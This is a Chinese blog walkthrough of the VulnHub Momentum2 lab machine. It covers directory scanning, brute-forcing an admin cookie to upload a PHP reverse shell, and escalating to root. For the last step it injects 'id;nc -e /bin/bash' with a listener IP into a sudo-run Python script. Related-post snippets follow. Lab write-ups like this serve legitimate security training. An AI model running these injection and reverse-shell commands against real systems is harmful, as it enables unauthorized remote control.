vulnhub之Momentum2

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量262 收藏
点赞数 1
分类专栏: 网络安全 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/119320045
版权

 Momentum2

信息搜集:

首先进行Ip扫描

 打开网页进行查看

 进行端口扫描

 发现他开启了22和80端口

 进行目录扫描:gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.181.140/ -x html,php,bak,txt -t 20

 

 渗透测试

在/dashboard.html发现可以文件上传

 

发现可以上传txt文件但是不可以上传php文件

上文中发现ajax.php.bak

 

  代码的意思就是当cookie存在时,键名为admin,可以上传php,pdf,txt文件,但是admin需要一个值,这个值是一个大写字母,还要使用post方式提交一个参数secure;最后上传成功时会返回一个1

crunch 1 1 -t , -o pass.txt(-t , 插入大写字母)

 

上面是生成的 大写字母的文档

于是使用brupsuit进行破解模块(这是抓取的数据包)

 

 

首先删除

X-Forwarded-For: 192.168.212.139

X-Originating-IP: 192.168.212.143

X-Remote-IP: 192.168.212.143

然后添加Cookie: admin=&G6u@B6uDXMq&Ms和 secure,val1d

 

 

 返回1,所以文件上传成功

运行111.php 文件,可以反弹shell

 

 python -c 'import pty; pty.spawn("/bin/bash")'

id查看当前的属主和属组

 

 在/home/athena看到第一个flag

 

提权:

发现一个密码文件

 

进行查看

 

 

 

 经过测试

用户名为athena 密码为myvulnerableapp*,并切换到该用户su - athena

 

 使用sudo -l行提权

 我们对这个获取root权限文件进行查看

 

 

 先运行sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py

 然后输入id;nc -e /bin/bash 192.168.181.129 5555

并在kali上进行监听5555端口

 于是获得root的shell

 

在/root 下获得最终的flag

 

我带的我们
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶场-Momentum: 2
hxync的博客
08-10 536
靶场下载地址:Momentum: 2 下好之后导入virtualbox启动 照例先扫一下主机 扫到靶机的ip地址为192.168.1.15 扫一下端口,开放了22和80端口 浏览器访问一下80端口 发现没有什么有用的信息,源码也看了一下,也没什么有用的信息 dirbuster扫一下目录 发现了一个文件上传的页面 一个备份文件 一个js文件 代码内容大概是当cookie存在且值为后面给出的那个字符串,注释部分有说明还需在字符串后面加一个大写字母,再用POST提交一个secure参数,参数的值
vulnhub--Momentum:2
venu_s的博客
07-09 597
靶机介绍 difficult:medium keywords:curl、bash、code review download:https://www.vulnhub.com/entry/momentum-2,702/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描,开放了22和80端口 目录扫描 gobuster dir -u http://192.168.187.171/ -x html,php,bak,txt --wordlist /usr
vulnhub-Momentum2
plant1234的博客
08-30 507
vulnhub-Momentum2靶机 首先先去下载靶机地址: https://download.vulnhub.com/momentum/Momentum2.ova 下载完靶机,直接利用VMave导入打开 一,信息收集 首先确定自己的靶机为net模式,知道自己靶机所在网段 然后利用kali进行IP扫描: nmap -sP 192.168.229.0/24 发现存活的IP,除去自己的IP 发现靶机IP:192.168.229.155 如果不能扫描出IP就查看这篇博客: https://hackergu.
[Vulnhub]Momentum2
cosmoslin的博客
11-18 1380
信息搜集 1.netdiscover 扫了半天扫不到,后来dl告诉说虚拟机配置有问题,参考 https://blog.csdn.net/qq_45290991/article/details/114189156 然后顺利扫到ip 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.133 3.nmap nmap -A 192.168.131.133 网站测试 尝试目录扫描 dirb,御剑等扫描无结果 gobuster dir -u
VulnHub靶机_MOMENTUM: 2
学术渣渣的博客
09-05 628
文章目录靶机介绍渗透过程靶机IP获取端口扫描信息收集信息1信息2burpsuite抓包改包 靶机介绍 这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1 下载地址:http://www.vulnhub.com/entry/momentum-2,702/ 难度:中等 描述:关键词curl, bash, code review 渗透过程 靶机IP获取 靶机的IP为192.168.1.105。 arp-scan -l 端口扫描 靶机开放了22和80端口。 nmap -A -T4 -p
ads momentum 指南2
04-15
ads momentum 应用指南英文版2
Chrome浏览器必备插件momentum
03-10
Momentum插件是一款桌面显示清新,自带时钟,自动更换高清壁纸,任务日历和工作清单的chrome浏览器插件。 官方的解释就是:替换你 Chrome 浏览器默认的“标签页”。里面的图片全部来自500PX里面的高清图,无广告,无...
Momentum插件
09-26
Momentum.crx 主页美化插件
Chrome必备插件momentum
07-04
Momentum插件是一款自动更换壁纸,自带时钟,任务日历和工作清单的chrome浏览器插件。官方的解释就是:替换你 Chrome 浏览器默认的“标签页”。里面的图片全部来自500PX里面的高清图,无广告,无弹窗,非常适合...
Momentum_v1.12.3.rar
02-12
Chrome美化插件Momentum离线压缩包 v1.12.3版本 q
MOMENTUM: 2 vulnhub walkthrough
xdeclearn的博客
07-19 346
信息 Momentum2.ova (Size: 698 MB) Download (Mirror): https://download.vulnhub.com/momentum/Momentum2.ova Download (Torrent): https://download.vulnhub.com/momentum/Momentum2.ova.torrent ( Magnet) 端口扫描和目录扫描 PORT STATE SERVICE 22/tcp open ssh 80/tcp open
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2
Aluxian_的博客
09-09 730
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flagmedium。
vulnhub之momentum
weixin_54431413的博客
06-25 516
js脚本信息泄露,AES解密,在线平台codepen.io,端口服务和进程查看命令,redis未授权访问。scp命令。
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4497
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
vulnhub-2much
底层社会中的弱智
02-09 359
确认目标主机IP以及前期的信息收集 做一下暴露面的收集 目标IP:192.168.43.154 看下暴露面: 开放了多个端口而且都是靶机环境,像是docker的感觉 debian系统 apache中间件 没有常见的CMS框架信息 查看下有没有捷径可以走 apache 2.4.25已知的漏洞 openssh 7.4 mysql 5.5.59 令我感兴趣的是8081端口的node_js ...
VulnHub-VulnOS: 2-靶机渗透学习
嗯嗯呐的博客
12-15 913
靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/ 靶机难度:初级(CTF) 靶机描述:VulnOS是打包为虚拟映像的一系列易受攻击的操作系统,以增强渗透测试技能 这是版本2- 体积更小,更少混乱! 由于时间并不总是在我身边,因此花了很长时间创建另一个VulnOS。但是我喜欢创建它们。该映像是使用VBOX构建的。解压缩文件并将其添加到虚拟化软件中。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 信息收集 nmap 扫描靶机IP nmap
Momentum:2靶机渗透测试
weixin_49340699的博客
07-13 514
Momentum:2靶机渗透测试流程 流程 用netdiscover对目标网段进行扫描 得到目标主机192.168.19.140 使用nmap对该主机进行端口扫描 得到端口22与80端口是开启的 上80端口看到只有三张图片就对目录进行爆破 gobuster dir -u http://192.168.19.140/ -x html,php,bak,txt --wordlist /usr/share/wordlist/dirbusters/directory-list-2.3-medium.txt ht
登录安全分析报告:小米官网注册
Explinks的博客
05-29 945
图形验证及交互验证方式的安全性到底如何?请看具体分析。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 287
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
momentum参数
07-27
momentum参数是在优化算法中常用的一个超参数,它用于控制模型在更新参数时的速度和方向。具体来说,它指定了模型在每次参数更新中应该考虑多少先前的梯度信息。 在梯度下降算法中,每次更新参数时,会根据当前的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值